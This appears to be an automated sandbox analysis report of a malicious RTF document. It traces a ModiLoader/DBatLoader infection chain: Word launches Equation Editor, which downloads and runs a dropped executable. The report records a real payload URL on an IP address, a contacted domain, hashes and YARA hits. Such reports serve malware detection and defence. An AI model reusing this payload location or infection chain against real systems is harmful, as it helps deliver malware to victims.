Analysis
-
max time kernel
140s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
26/09/2024, 11:04 UTC
Static task
static1
Behavioral task
behavioral1
Sample
9f00a5fc9bdc5206d34d60f39e9872df590b4b71685afb0996e2d46e2b5a97d2.rtf
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
9f00a5fc9bdc5206d34d60f39e9872df590b4b71685afb0996e2d46e2b5a97d2.rtf
Resource
win10v2004-20240802-en
General
-
Target
9f00a5fc9bdc5206d34d60f39e9872df590b4b71685afb0996e2d46e2b5a97d2.rtf
-
Size
101KB
-
MD5
7a9a05109dd848058fd327bc38459a3d
-
SHA1
a086488bd204ca42e9d522b769b94c9467ad5520
-
SHA256
9f00a5fc9bdc5206d34d60f39e9872df590b4b71685afb0996e2d46e2b5a97d2
-
SHA512
8dde56f67785f7594f1e4fe2a3b05519333daa980bae0fd84ffa34671d1d1f7507af6d04dba4909d3195db536ae2fd2782a6f45f5eb7f0df5015ca4b88e0925d
-
SSDEEP
768:mbTYjIXuCGvGvJSuv0AwTaTSvq1e397u1X:mojyValnaev+eNK
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader Second Stage 60 IoCs
resource yara_rule behavioral1/memory/2560-20-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-31-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-34-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-36-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-25-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-39-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-43-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-46-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-50-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-26-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-53-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-55-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-60-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-63-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-27-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-65-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-68-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-74-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-71-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-77-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-79-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-82-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-28-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-29-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-32-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-64-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-84-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-83-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-81-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-80-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-78-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-76-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-75-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-72-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-70-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-69-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-67-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-66-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-62-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-61-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-59-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-58-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-57-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-56-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-54-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-52-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-51-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-49-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-48-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-47-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-45-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-44-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-42-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-41-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-40-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-38-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-37-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-35-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-33-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 behavioral1/memory/2560-30-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 -
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2892 EQNEDT32.EXE -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 2560 audiodg.exe -
Loads dropped DLL 5 IoCs
pid Process 2892 EQNEDT32.EXE 2892 EQNEDT32.EXE 1840 WerFault.exe 1840 WerFault.exe 1840 WerFault.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Program crash 1 IoCs
pid pid_target Process procid_target 1840 2560 WerFault.exe 33 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language audiodg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 2892 EQNEDT32.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2900 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2900 WINWORD.EXE 2900 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2892 wrote to memory of 2560 2892 EQNEDT32.EXE 33 PID 2892 wrote to memory of 2560 2892 EQNEDT32.EXE 33 PID 2892 wrote to memory of 2560 2892 EQNEDT32.EXE 33 PID 2892 wrote to memory of 2560 2892 EQNEDT32.EXE 33 PID 2900 wrote to memory of 1112 2900 WINWORD.EXE 35 PID 2900 wrote to memory of 1112 2900 WINWORD.EXE 35 PID 2900 wrote to memory of 1112 2900 WINWORD.EXE 35 PID 2900 wrote to memory of 1112 2900 WINWORD.EXE 35 PID 2560 wrote to memory of 1840 2560 audiodg.exe 36 PID 2560 wrote to memory of 1840 2560 audiodg.exe 36 PID 2560 wrote to memory of 1840 2560 audiodg.exe 36 PID 2560 wrote to memory of 1840 2560 audiodg.exe 36
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9f00a5fc9bdc5206d34d60f39e9872df590b4b71685afb0996e2d46e2b5a97d2.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1112
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Users\Admin\AppData\Roaming\audiodg.exe"C:\Users\Admin\AppData\Roaming\audiodg.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 7163⤵
- Loads dropped DLL
- Program crash
PID:1840
-
-
Network
-
Remote address:107.175.243.142:80RequestGET /340/audiodg.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 107.175.243.142
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Wed, 25 Sep 2024 00:08:41 GMT
ETag: "109c00-622e66ca7c781"
Accept-Ranges: bytes
Content-Length: 1088512
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/lnk
-
Remote address:8.8.8.8:53Requestmaan2u.comIN AResponsemaan2u.comIN A112.137.173.77
-
23.1kB 1.2MB 480 836
HTTP Request
GET http://107.175.243.142/340/audiodg.exeHTTP Response
200 -
190 B 132 B 4 3
-
390 B 650 B 6 5
-
334 B 650 B 6 5
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5e0ddab4d3057a6120f77ac3873a0667e
SHA1264afe13a44196ab1c35a83d9736ca2140e6015f
SHA256ceedcb97af3bc5cdba7560964ee665321877858bf979beeb94366df6c2dd34ac
SHA5126372af6138956303155d3e52003b1d17943dd574db5ccb0eb2ddea5d12c889630981b363f89718290c4ae28c1981ac2f452ab77026d65c2f2c54f069b75bc8de
-
Filesize
1.0MB
MD5bbf710c83246092a538128620853d4fd
SHA195338f06c76178de31b5e8453f92c43f970ea9f9
SHA2567ad64f279e3fa6a7d0ef2916240f1337584c5b5176fb56089771164f2905554f
SHA512a609d92fe0d25e7db140c731af4b241d47cdaddfe735d9f7575c982ef790ab01d7f969038546e6054101b745e8c208f74e41faf246173ca0722c7b994cf94001